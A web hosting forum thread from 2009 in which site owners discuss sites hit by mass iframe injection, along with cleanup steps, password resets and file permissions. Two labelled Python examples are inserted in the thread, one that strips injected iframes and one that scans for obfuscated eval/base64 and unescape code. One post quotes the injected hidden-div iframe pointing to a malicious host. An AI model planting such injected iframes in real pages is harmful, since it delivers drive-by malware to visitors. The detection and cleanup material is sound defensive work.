PowWeb Forums - The Perfect Community for the Perfect Host  

Old 9-27-09, 08:49 PM   #36
Chris_S
 
Join Date: Jan 2009
Location: Canada
Posts: 30
Reputation: 3
I just checked and the permissions are set to 644 for .js and .css files and 755 for .html files. Some .jpgs are 755 and some are 644. I don't know why they are different.

When designing my website years ago I had reasons for using iframes but that was a long time ago so I don't remember what was going through my head. I will try to explain.

- I don't like how most sites have the entire window 'refresh' whenever a user clicks a link in a menu.
- I like to have control over the individual pages for each image and gallery section.
- If I didn't use iframes then I would have one huge page with everything hidden, then use CSS/JS to unhide and display the images and text. Or I would have many pages that would include the same main menu, and that doesn't seem very efficient. My logic may be flawed; I don't know a whole lot about scripting.
- Requires less scripting to create the effect I want.

It really doesn't matter the reasons, as I'm willing to consider alternatives just as long as it creates the same effect that's already on the site.
Old 9-27-09, 09:44 PM   #37
snowmaker
 
 
 
Join Date: Nov 2002
Location: Solomons Island
Posts: 2,217
Reputation: 212
644 is fine for all .js, .css and .html files. 755 is fine for directories. .js files could be fine with permission down to 600. PHP included files, and .php files themselves will mostly work fine at 600. A PHP included directory could be down to 700. Just remember, every file/directory shouldn't have more permissions than it needs to be run, IOW (In Other Words), don't set anything any higher than 644/files, 755/directories. If a script needs higher permissions to be run correctly, scrap it.

The way a webpage 'acts' because of iframes can almost always be duplicated, and probably better, with PHP includes.
__________________
-bruce /* somdcomputerguy */
'If you change the way you look at things, the things you look at change.'
Old 9-27-09, 09:44 PM   #38
tpoynton
Custom User Title
 
 
Join Date: Sep 2004
Location: Mass
Posts: 1,707
Reputation: 208
Sounds like you want AJAX, which does require more scripting - although I have no real idea because I only know how it works in theory... I'd call iframes a shortcut - with all the potential issues.

I wonder if using iframes to call content from your own site has the same security risks as using it to get content from somewhere else?
Old 9-27-09, 11:17 PM   #39
Chris_S
 
Join Date: Jan 2009
Location: Canada
Posts: 30
Reputation: 3
Yeah, this is becoming a bit more complicated than I hoped. Can someone tell me how exactly hackers use iframes? From what I read, it was hackers creating sites using iframes to hack search engine results, and had nothing to do with hackers hacking a legitimate site that uses iframes. I did play around with PHP scripts and it seemed a lot slower. I would rather stick with browser-side scripting.

The only issues I see(with my limited knowledge) with iframes are that search engines don't search the pages within iframes and that it's no longer a W3C standard.

snowmaker, thanks for the tips. I will do some research on file permissions.
Old 9-27-09, 11:22 PM   #40
snowmaker
 
 
 
Join Date: Nov 2002
Location: Solomons Island
Posts: 2,217
Reputation: 212
To give you more of an idea how PHP includes can be used, see any of the sites in my sig. There's basically one file, index.php, that includes a text file to make up a page based on the link clicked.
__________________
-bruce /* somdcomputerguy */
'If you change the way you look at things, the things you look at change.'
Old 9-27-09, 11:38 PM   #41
Chris_S
 
Join Date: Jan 2009
Location: Canada
Posts: 30
Reputation: 3
Thanks. That's the right idea. Is there any way to get rid of the entire page 'flicker' in IE? In Firefox I don't see it, though. Or use PHP to load a page within an element so the entire page doesn't have to reload?
Old 9-27-09, 11:52 PM   #42
snowmaker
 
 
 
Join Date: Nov 2002
Location: Solomons Island
Posts: 2,217
Reputation: 212
I wasn't aware of any flicker-type issues with any of my sites, in any browser that they do work in. I'll have to take a look at that. PHP and CSS can be used well together. See here: 22 Resources to Easily Create CSS Layouts | Vandelay Design Blog
__________________
-bruce /* somdcomputerguy */
'If you change the way you look at things, the things you look at change.'
Old 9-28-09, 05:01 AM   #43
HalfaBee
 
 
Join Date: Feb 2002
Location: Sydney, Australia
Posts: 7,131
Reputation: 333
You don't need to use php for AJAX like pages.
You can just load the static pages via JS and display them in a <div>.

I don't think the iframes are the way the hackers are hacking sites, it is just that they insert an iframe with a link to malware.
__________________
I don't suffer from laziness, I enjoy every minute!
Edit your php.ini here
http://members.powweb.com/member/cgi...nt/PHPplus.bml
Old 9-29-09, 02:35 AM   #44
Croc Hunter
Mod.. with bite..
 
 
Join Date: Sep 2002
Location: Australia
Posts: 6,630
Reputation: 383
I've had several old clients contact me complaining of this lately. 9/10 infected sites are running out-of-date applications like WordPress, Zencart, Movable Type, and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index type files account-wide.

You have to update the applications and reset every database, FTP, OPS account, etc passwords. Then cleanup all other infected files and don't let anyone login until they've run Malwarebytes.

I searched and searched for a script to strip out the <div style="display:none">blahcrapolablah<iframe width=436 height=773 src="http://russian-crap.ru:1234/index.php" ></iframe></div><div style="display:none">

How hard would a cleanup script be to write? I tried a few times but it's a bit beyond me. Can someone write it? I would pay. Some of these guys have hundreds of thousands of files and of course.. no backups.
__________________
Croc Hunter MSC :
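A cleanup script of the kind asked for above, added here as an example and not a script from the thread or from PowWeb: it strips the hidden-div iframe pattern quoted in the post and any other iframe whose src points off-site, while keeping the site's own iframes (the gallery-style frames discussed earlier in the thread). The file extensions, the backup naming, the own-host list and the sample page (with the placeholder hosts malicious.example and other.example) are assumptions.

```python
"""Strip injected hidden-div iframes from a site's HTML/PHP files.

Added example, not a script from the thread or from PowWeb. It removes the
shape quoted in the post above, <div style="display:none"> ... <iframe
src=...></iframe></div>, and any other iframe whose src names a host that is
not the site's own, while leaving same-site iframes untouched. Every file it
rewrites is copied to <name>.bak first, and it is a dry run unless --write
is given.
"""
import os
import re
import shutil
import sys
from urllib.parse import urlparse

# The injection shape from the post: a hidden <div> wrapping an <iframe>.
HIDDEN_IFRAME_DIV = re.compile(
    r'<div\s+style\s*=\s*["\']?\s*display\s*:\s*none\s*;?\s*["\']?\s*>'
    r'(?:(?!</div>).)*?<iframe\b[^>]*>.*?</iframe>\s*</div>',
    re.IGNORECASE | re.DOTALL,
)
# Any remaining iframe with a src attribute; the src is captured for a host check.
IFRAME_WITH_SRC = re.compile(
    r'<iframe\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)[^>]*>.*?</iframe>',
    re.IGNORECASE | re.DOTALL,
)
SCAN_EXTENSIONS = (".html", ".htm", ".php")  # assumed set of file types to scan


def is_offsite(src, own_hosts):
    """True when src names a host outside own_hosts; relative URLs count as on-site."""
    host = urlparse(src).hostname
    return host is not None and host.lower() not in own_hosts


def clean_html(html, own_hosts):
    """Return (cleaned_html, removed_count) for one document's text."""
    own_hosts = {h.lower() for h in own_hosts}
    cleaned, hidden_removed = HIDDEN_IFRAME_DIV.subn("", html)
    counter = [hidden_removed]

    def drop_if_offsite(match):
        if is_offsite(match.group(1), own_hosts):
            counter[0] += 1
            return ""
        return match.group(0)  # same-site iframe: keep it

    cleaned = IFRAME_WITH_SRC.sub(drop_if_offsite, cleaned)
    return cleaned, counter[0]


def clean_tree(root, own_hosts, dry_run=True):
    """Walk root and return [(path, removed_count)] for every affected file.

    With dry_run=False each affected file is copied to path + '.bak' and rewritten.
    """
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                original = fh.read()
            cleaned, removed = clean_html(original, own_hosts)
            if removed == 0:
                continue
            report.append((path, removed))
            if not dry_run:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return report


# Constructed sample page: two legitimate iframes, one hidden-div injection,
# one bare off-site iframe. The hosts are placeholders, not real indicators.
SAMPLE_HTML = (
    "<html><body><h1>Gallery</h1>\n"
    '<iframe src="gallery/page1.html"></iframe>\n'
    '<iframe src="http://www.example-site.com/menu.html"></iframe>\n'
    '<div style="display:none">blah<iframe width=436 height=773 '
    'src="http://malicious.example:1234/index.php" ></iframe></div>\n'
    '<iframe src="http://other.example/x.php"></iframe>\n'
    "</body></html>\n"
)

if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: clean_iframes.py SITE_ROOT OWN_HOST[,OWN_HOST...] [--write]")
    write = "--write" in sys.argv
    for path, count in clean_tree(sys.argv[1], sys.argv[2].split(","), dry_run=not write):
        print(f"{path}: {count} injected iframe(s)" + ("" if write else " (dry run)"))
```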
Old 10-3-09, 11:28 PM   #45
Chris_S
 
Join Date: Jan 2009
Location: Canada
Posts: 30
Reputation: 3
Quote:
Originally Posted by Croc Hunter View Post
and they or someone who logs into the application/FTP finds a trojan on their computer with Malwarebytes. It inserts the malicious iframe code into all home, default, index, type files account wide.

I think that's what happened, but instead of inserting iframe code an unescape JavaScript function was inserted into every page.

If no one else has anything to add I will delete everything off the server and refresh it from the backups.

Thanks again for the help.
Old 10-7-09, 03:18 AM   #46
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
My Site Hacked Big Time

This is my first experience having my website "hacked", or invaded. Isn't there a law against this? I thought I was safe.

On 9/1/2009 at 3:10 into 3:11 every one of the several hundred html files on my site was modified. This "Iframe" tag was added to EVERY html file.

<<iframe details removed>>

This attack dug deep into every directory and subdirectory, and did not miss one html file (and it covered index.php files too.)

I don't know exactly what this "IFRAME" tag is supposed to do, or how it does it, this is all very new to me, but apparently this simple addition will result in malware being loaded onto a visitor's computer. As a result, Google diagnostics has labeled my site "suspicious."

(Can someone please explain how this "Iframe" tag can cause malware to be downloaded to my visitor's computer? How is that possible?)

I did not discover the issue until today. And I immediately spent about 4 hours uploading clear copies of every HTML file. (I had other plans for my time, I can assure you).

I want to know if this has happened to anyone else on powweb recently. Is this a system or a network issue? Or was my site singled out for this treatment?

And I want to know how in the world this could have happened. I thought I was the only one who could modify files on my site. But here, several hundred HTML files were modified without my consent or knowledge. Every html file on the site. Did not miss one of them. Several hundred.

Can someone PLEASE give me an idea of where to start looking to try to understand how this happened, so hopefully I can do something that will make sure it will never happen again?

Sincerely,
GoldenEagles

Last edited by IanS : 10-7-09 at 04:37 AM. Reason: Offending URL removed
Old 10-7-09, 04:09 AM   #47
HalfaBee
 
 
Join Date: Feb 2002
Location: Sydney, Australia
Posts: 7,131
Reputation: 333
Hacking mostly occurs due to old versions of CMSs like WordPress etc.

Please remove the offending URL from your post.
__________________
I don't suffer from laziness, I enjoy every minute!
Edit your php.ini here
http://members.powweb.com/member/cgi...nt/PHPplus.bml
Old 10-8-09, 01:48 AM   #48
Croc Hunter
Mod.. with bite..
 
 
Join Date: Sep 2002
Location: Australia
Posts: 6,630
Reputation: 383
It's a trojan keystroke recorder. I've had to cleanup several accounts here and at another host. I wish someone clever would write a little script to strip out the <iframe>*</iframe> infection.

Here's a quick what-to-do guide.
1. Install, update and scan your PC with Malwarebytes
2. Update and scan your PC/Mac with your antivirus
3. Restore the oldest site backup from in OPS or your own clean backup.
4. Download the latest version of any application like WordPress, ZenCart, Gallery etc you use. Upload it overwriting the existing files. Also upgrade your local applications like FileZilla.
5. Go through and manually remove the iframe code from ALL index home and default files account wide (even files like default-widgets or home2). Don't forget plugins, themes, forum pages etc. (while slow it's safe to do this via OPS FileManager).
6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.
7. Once you are positive you are clean create a backup!
8. Wait 24hrs. If you do not get re-infected request a review of your site through Google webmaster tools.
__________________
Croc Hunter MSC :
Old 10-8-09, 02:20 AM   #49
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Responding to Halfabee first,

I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.

Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.

I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the Zen Cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IPs trying to access the Zen Cart. And this was consistently, a few times a week.

Perhaps these things are akin to some of what you are referring to?

Is there any way to pin down, with a high degree of certainty, whether either of these two avenues were used as the attack path?

P.S. I zipped both installations, and deleted the active folders last night. Oh yes, and I found three files in my cgi-bin that I know I did not put there. I deleted them too.

Last edited by GoldenEagles : 10-8-09 at 02:25 AM. Reason: additional info
Old 10-8-09, 02:33 AM   #50
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Quote:
Originally Posted by Croc Hunter View Post
It's a trojan keystroke recorder.

Please explain: what is this trojan keystroke recorder, and how would that relate to an attack like this? According to the date and time stamps of the corrupted files, several hundred files were modified in about one minute. That is, several hundred append actions were accomplished in about one minute. That is, the rogue "Iframe" tag set was appended to several hundred html files in about one minute.
Old 10-8-09, 10:04 AM   #51
Croc Hunter
Mod.. with bite..
 
 
Join Date: Sep 2002
Location: Australia
Posts: 6,630
Reputation: 383
You'd be best to Google it. Once they get access they execute a script to find any index etc and insert the code. It only takes a minute or two. All but one of the accounts I've cleaned so far had out of date ZenCarts. Follow the steps I posted.
__________________
Croc Hunter MSC :
Old 10-8-09, 12:02 PM   #52
Dbrazzell
PowWeb Staff
 
 
Join Date: Nov 2008
Location: Burlington
Posts: 386
Reputation: 122
Most of these iframes that get inserted into the sites send visitors over to another third-party site that is sitting waiting to give you the latest drive-by download, which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phishing schemes.

It's really all up to who's running the third-party site and what they are feeling like pushing that day.

It's set up so they only have to infect your site once with the malicious iframe. But they can change what visitors are infected with at any time they feel like it.

I have seen the SEO spamming stuff that someone earlier mentioned. That seems to be a lot rarer.
__________________
For Robots only Linky
Old 10-9-09, 02:18 PM   #53
sinbsd
Registered
 
Join Date: Oct 2009
Location: Edmonton
Posts: 2
Reputation: 0
What CMS are you using on this site? I'm wondering if it's current, or perhaps I can give some insight as to its security upkeep?
Old 10-9-09, 08:45 PM   #54
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Quote:
Originally Posted by sinbsd View Post
What CMS are you using on this site? I'm wondering if it's current or perhaps I can give some insight as to it's security upkeep?

As noted above, in response to halfabee:
I had forum software PHPBB 3.0 installed sometime last year, worked on configuring it for some time, but I never rolled it out for public use, and I never installed any of the updates. Visiting the PHPBB website, I see the current release is version 3.0.5, and that some of the intermediate updates dealt with some security issues.

Also, I had the ZenCart software installed last year. I worked with configuring it for a couple of weeks, but again, other things came up to capture my time, and I never rolled it out for public use, and of course, I never installed any updates or security patches to it. Both installations occupied folders off of the HTDOCS directory.

I just visited the ZenCart website, and looked at the security patches they offered, none of which I was aware of, none of which I installed, and I can see that there were at least two security issues that were substantial, and might have led to the extent of the compromise I experienced here. This is coupled with the fact that I had seen the probing of the Zen Cart files in my access logs over time, accesses which I did not know how to interpret. I wondered how anyone even knew the directory paths, as I had never made them public, but there they were, IPs trying to access the Zen Cart. And this was consistently, a few times a week.
I archived both installations, and deleted the active folders, and just to be safe, I transferred the zipped archives to my local machine. My site is now script free. I think I have closed all the doors.

Any further ideas that you might have, I would like to hear.
Old 10-9-09, 08:49 PM   #55
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Quote:
Originally Posted by Dbrazzell View Post
Most these iframes that get inserted into the sites send visitors over to another third party site that sitting waiting to give you the latest drive by download which is usually an entire host of nasty software such as keyloggers, trojans, fake antivirus software, and phising schemes.

I would like to know how this could be done so easily. Does malware strategy depend on security holes in the browser, and if so, which browser is most vulnerable? And why are these holes not plugged?

Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser? Isn't that right?
Old 10-9-09, 10:09 PM   #56
snowmaker
 
 
Join Date: Nov 2002
Location: Solomons Island
Posts: 2,217
Reputation: 212
Quote:
Originally Posted by GoldenEagles View Post
Certainly, the idea that things can be downloaded onto your computer without your knowledge, could not be part of the design criteria of any browser?

Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search
__________________
-bruce /* somdcomputerguy */
'If you change the way you look at things, the things you look at change.'

Last edited by snowmaker : 10-10-09 at 01:23 PM.
Old 10-12-09, 01:48 AM   #57
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Quote:
Originally Posted by snowmaker View Post
Micro$oft (Internet Explorer) would not agree with that.. why is activex dangerous - Google Search

I did that search on Google, and I see that the most recent reference to this issue is more than three years old. For that reason, I am concluding that ActiveX controls do not seem to be an issue of high security concern when it comes to the majority of avenues used to infect PCs with malware. And I suppose this is especially true because their download is signaled, and the user can choose to reject the download.

From what I understand, the issue that we are dealing with here is ways to get around download detection routines in the browser, where these malicious programs end up on the person's computer, and running on the person's computer, without the user having any idea that anything at all has been downloaded. Isn't that right?

And I would ask the question again, why aren't these security holes closed? Or perhaps they are closed, but some users don't update their browser to the latest release? Or perhaps, if one hole is closed, that patch itself has a hole in it that the hackers find and exploit. I wonder if someone could give a definitive answer on this point.
Old 10-12-09, 02:43 AM   #58
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
I wanted to give an update on my search for the path that this hacker may have exploited into my website.

As I noted above, I zipped my outdated installation of both Zen Cart and PhpBB3. And I downloaded those archives to my local computer. And I deleted both the zipped archives, and the installation folders for these applications from my website.

Locally, I ran an Avira scan on these two zipped archives.

The phpbb3 archive did not show anything but a few of the iframe infections that I had missed when I first uploaded clean html files into every directory.

However, the Zen Cart archive showed the following infections:
--> Zen_Cart_Installation/images/juno-user
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Katien.R back-door program
--> Zen_Cart__Installation/images/ycplia.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus
--> Zen_Cart__Installation/images/fdqthz.php
[DETECTION] Contains recognition pattern of the PHP/C99Shell.C PHP virus
I think it is fair to conclude from this, that it is highly probable that the attack on my website came through the Zen Cart installation, which as I noted, had never been used, had never been rolled out for public use, nor had it been updated with any security patches for one year.

When I visited the Zen Cart website a few days ago to look at what security issues had come up during that time period, I found a few that were very serious, and they discussed them openly, and they immediately issued patches. For Zen Cart operators who are paying attention, they could be relatively safe, if they installed the patches immediately. However, their openness in this regard also gives the hackers exactly the information they need to exploit those Zen Cart installations where the patches are not installed (like mine). In this regard, I saw a distinct difference in the PHPBB3 approach to security. On the PHPBB3 site, there were no open discussions concerning the details of security issues. Users could report security issues to their security center, but those posts were kept private, and there were no public forums detailing the precise security issues that had come up. This was an obvious choice on their part, as such information can be used by the hackers too, as noted.

I would just note from this, that one thing we might learn from this, is that Zen Cart operators should be very careful about following the security issues on the Zen Cart website (as the hackers are obviously following their announcements), and when patches are provided, that these should be implemented immediately. Zen Cart operators should have this goal in mind, that the patches be implemented faster than the hackers can find an unguarded Zen Cart.

I can imagine this, that these hackers have robots combing the web for the presence of Zen Cart installations, and the very minute a security issue is brought forward on the Zen Cart site, they can tell their robot where to look for the newest vulnerability. In support of this thesis, I note that my website is crawled by dozens of robots every day. What are they looking for? Moreover, as I mentioned above, I had seen in my website access logs repeated accesses to the Zen Cart installation, which was inexplicable to me at the time because I was not aware that I had told anyone that it was there. I did not know what to make of this at the time. These hackers might send their robots out looking for many other kinds of CGI/PHP installations, but for Zen Cart, this looks rather easy to exploit given their openness in laying bare the details of the holes found in their security. This is not a criticism of them on this point, however. Their openness in this regard is largely due, I think, to the fact that the implementation of security patches in Zen Cart requires the user to manually modify PHP code in one or more files. And so, the file names and code have to be laid bare for all users so that the "patches" can be implemented.

This is far different from Windows Update for example, where updates are downloaded, and automatically installed, without anyone seeing the nature of the fix that is being implemented.

From my short visit to the PHPBB3 website, I get the sense that PHPBB3 also uses this modular updating approach, where the public does not see the details of the code that is being modified when they issue a security patch, that it is done more or less automatically.
Old 10-17-09, 09:40 AM   #59
mark anthony
Registered
 
Join Date: Oct 2009
Location: USA
Posts: 1
Reputation: 0
hacked

hi there!!

How will I know that my account or site is being hacked? I am suspecting something bad's happening to my site.
Old 10-17-09, 11:46 AM   #60
rainbore
Rick
 
Join Date: May 2002
Location: Minneapolis, MN
Posts: 1,503
Reputation: 162
One way to check your site is to use Google's Safebrowsing diagnostic tool. Just enter
Code:
http://www.google.com/safebrowsing/diagnostic?site=www.yoursite.com
Just replace "www.yoursite.com" with your own domain name. This tool will show you if any of Stopbadware's partners have reported your site as being suspicious. Another good online tool is Unmask Parasites which scans webpages for common hacks in real time. If you know HTML, there's a new tool in the Google Webmaster Tools console under "Labs" that will show you what Googlebot sees when it fetches pages from your site. Some hacks only reveal themselves to Googlebot, so this can be useful. Another good idea is to do a simple "site:" search in Google to see if Google has indexed anything that you don't recognize as your own.

You can also use the Powweb File Manager or whatever FTP program you use to check the modification dates on all of the files on your site. If the dates on the site don't match the dates when you last uploaded the files or if the file sizes don't match, it's a sign of trouble.

There's some very good information available at stopbadware.org's Tips for Cleaning and Securing Your Website.

Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC, and every webmaster should be sure to use such software to prevent their website account information from being stolen. This is becoming a more common issue, although it still is not how the majority of sites get hacked. But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.

If you run any blog, forum, gallery, CMS, shopping cart or other common script, you should make it a part of your routine site maintenance to check to make sure that you are running the latest version. By far the most common means by which hackers gain access to a site is through known vulnerabilities in older versions of popular scripts. Since many scripts promote themselves automatically on every page they generate, often all that a hacker has to do to locate a vulnerable site is to do a Google search for the software name and the version number, so don't think that just because your site isn't that popular or that you don't do much with these scripts that you are safer.
Old 10-17-09, 09:58 PM   #61
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Rainbore, that was altogether a good and informative post. However, I would address this particular point ....

Quote:
Originally Posted by rainbore View Post
Anti-virus and anti-malware software that runs on your home computer is designed to detect and remove infections that attack your PC .... But these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good.

After recognizing the hack attack on my website, which inserted a rogue iframe tag in every html page, and index.php pages, hundreds of pages altogether, I replaced all the html pages with clean pages. Because of the complexity of the file structure I did not do this for my Zen Cart installation. For this, I zipped the whole installation, and then downloaded the archive to my PC. I then ran an Avira scan on that zipped archive, and Avira found every rogue Iframe, and it also found three additional trojan scripts, the purpose of which, I am assuming, was to give the hacker direct access to my website.

Therefore, I must observe that your statement quoted above, "that these programs are generally ineffective at scanning webpages and other files for signs of hacking, so downloading your files to scan them is unlikely to do any good ...", seems to be too broad of a generalization. It may be true that some anti-virus packages may not be useful in this regard. But Avira seemed to do an excellent job in the situation I just described.
Old 10-18-09, 02:21 PM   #62
Croc Hunter
Mod.. with bite..
 
 
Join Date: Sep 2002
Location: Australia
Posts: 6,630
Reputation: 383
I disagree, GoldenEagles; rainbore's advice is entirely accurate. Most people have never even heard of Avira. It's not in the current top ten most popular antivirus. Big brand names like Norton and PC-Cillin don't even rank; that puts you in the minority. The lucky minority at that, in this case.

I pretty much told you it was Zencart back on post #51 ~smack~ Look in your antivirus vault, name the 3 rogue files you found and where exactly you found them. It will help others here and I'd like to research them further. It is more than likely your Zencart database is corrupt so delete "drop" it if you can along with any other unused databases. Then check all user tables of remaining databases for suspect entries.
__________________
Croc Hunter MSC :
Old 10-19-09, 02:28 AM   #63
Chris_S
 
Join Date: Jan 2009
Location: Canada
Posts: 30
Reputation: 3
Quote:
Originally Posted by Croc Hunter View Post
6. Reset all OPS, FTP, and database passwords (use strong passwords). Reflect these changes in your config files. Set Chmod permissions on all folders 755 and all files 644.

What do you mean by reflect your changes in the config files?
Old 10-19-09, 02:59 AM   #64
GoldenEagles
Registered
 
Join Date: Oct 2009
Location: California
Posts: 13
Reputation: 3
Avira Anti-Virus Software

Quote:
Originally Posted by Croc Hunter View Post
Most people have never even heard of Avira. It's not in the current top ten most popular antivirus.

Since 2004, Av-Comparatives.Org has run comprehensive tests on a variety of anti-virus products. They have included Avira in the tests since 2006.

avast! Professional Edition 4.8
AVG Anti-Virus 8.5
AVIRA AntiVir Premium 9
BitDefender Antivirus 2010
eScan Anti-Virus 10
ESET NOD32 Anti-Virus 4.0
F-Secure Anti-Virus 2010
G DATA AntiVirus 2010
Kaspersky Anti-Virus 2010
Kingsoft Antivirus 2009
McAfee VirusScan Plus 2009
Microsoft Live OneCare 2.5
Norman Antivirus & Anti-Spyware 7.10
Sophos Anti-Virus 7.6
Symantec Norton Anti-Virus 2010
TrustPort Antivirus 2009

Avira not only had the overall highest detection rate, but Avira had the highest detection rate in each of the test categories:
Windows Viruses
Macro viruses
Script Malware
Worms
Backdoors/Bots
Trojans
other malware
I hope this information update will be helpful to you.

Last edited by Croc Hunter : 10-24-09 at 09:20 AM. Reason: edited and disabled links
Old 10-21-09, 01:09 PM   #65
shrupa
Registered
 
Join Date: Feb 2009
Location: India
Posts: 13
Reputation: 0
Try this .ftpaccess to limit FTP access through your IP only. Try this, not sure it will work.
Upload the file to root. Enter your IP instead of w.x.y.z!!!!
<Limit ALL>
DenyAll
Allow w.x.y.z
</Limit>
Old 10-25-09, 02:52 AM   #66
snowmaker
 
 
Join Date: Nov 2002
Location: Solomons Island
Posts: 2,217
Reputation: 212
Quote:
Originally Posted by shrupa View Post
Try this .ftpaccess to limit FTP access through your IP only. Try this not sure will work..

It does. For me anyway.. I'm quite sure it'll work for everybody else too..
__________________
-bruce /* somdcomputerguy */
'If you change the way you look at things, the things you look at change.'
Old 11-3-09, 12:07 AM   #67
mpk
PowWeb Staff
 
 
Join Date: Dec 2008
Location: united states
Posts: 80
Reputation: 14
Another good tool to use is the website secunia.org. They have a page http://secunia.com/advisories/product/ that will list known vulnerabilities for a vast number of applications including Zen Cart, phpBB, etc.

A few additional things that should trigger anybody to be cautious and check their account for signs of unauthorized activity:
- sudden large number of unfamiliar email bouncebacks
- sudden large increase in site traffic seen through visitor stats without a marketing campaign
- A file in your account executes code that has been obfuscated

Obfuscation is usually done through base64 encoding / decoding but may also be done through character switching, character arrays, and many other methods.

Please feel free to contact support if you suspect a file in your account has been hacked and need help.
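A scanner for the obfuscation indicators listed above (base64 decoding fed into eval, character-switching via str_rot13, chr() character arrays) plus the long unescape() strings Chris_S reported earlier in the thread, added here as an example and not PowWeb's or any poster's tooling. The rule names, length thresholds, file extensions and the embedded sample files are constructed for illustration.

```python
"""Flag files that execute obfuscated code, one of the warning signs above.

Added example, not PowWeb tooling. Each rule is a heuristic for one of the
obfuscation styles the post names (base64 decode feeding eval, character
switching, character arrays) or for the unescape() payloads mentioned earlier
in the thread. Thresholds and extensions are assumptions; a hit is a reason
to open the file, not proof of compromise.
"""
import os
import re
import sys

RULES = [
    # eval( ... base64_decode( with any number of wrappers between them,
    # e.g. eval(gzinflate(str_rot13(base64_decode("...")))).
    ("eval of base64_decode",
     re.compile(r'eval\s*\((?:\s*\w+\s*\()*\s*base64_decode\s*\(', re.I)),
    # Character switching: str_rot13 output executed directly.
    ("eval of str_rot13",
     re.compile(r'eval\s*\((?:\s*\w+\s*\()*\s*str_rot13\s*\(', re.I)),
    # JavaScript: eval(unescape("%3C...")) or document.write(unescape(...)).
    ("eval/document.write of unescape",
     re.compile(r'(?:eval|document\.write)\s*\(\s*unescape\s*\(', re.I)),
    # One base64-looking string literal of 120+ characters (threshold assumed).
    ("long base64 literal",
     re.compile(r'["\'][A-Za-z0-9+/]{120,}={0,2}["\']')),
    # Character arrays: eight or more chr(n) calls glued together with '.'.
    ("chr() concatenation chain",
     re.compile(r'(?:chr\s*\(\s*\d+\s*\)\s*\.\s*){8,}', re.I)),
    # Forty or more %xx escapes in a row, the usual unescape() payload.
    ("long %xx escape string",
     re.compile(r'(?:%[0-9A-Fa-f]{2}){40,}')),
]
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm", ".inc")  # assumed


def scan_text(text):
    """Return [(rule_name, snippet)] for every rule that fires on text."""
    hits = []
    for name, pattern in RULES:
        match = pattern.search(text)
        if match:
            hits.append((name, match.group(0)[:60]))
    return hits


def scan_tree(root):
    """Walk root and return {path: hits} for files with at least one hit."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[path] = hits
    return findings


# Constructed samples: an ordinary include page and two injected payloads.
BENIGN_PHP = "<?php include 'pages/home.txt'; ?>\n"
INJECTED_PHP = '<?php eval(gzinflate(base64_decode("' + "QUJD" * 40 + '"))); ?>\n'
INJECTED_JS = '<script>document.write(unescape("' + "%3C%69" * 25 + '"));</script>\n'

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in sorted(scan_tree(root).items()):
        print(path)
        for name, snippet in hits:
            print(f"  [{name}] {snippet}")
```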
Contents ©PowWeb, Inc. ~ vBulletin, Copyright © 2000-2007 Jelsoft Enterprises Limited.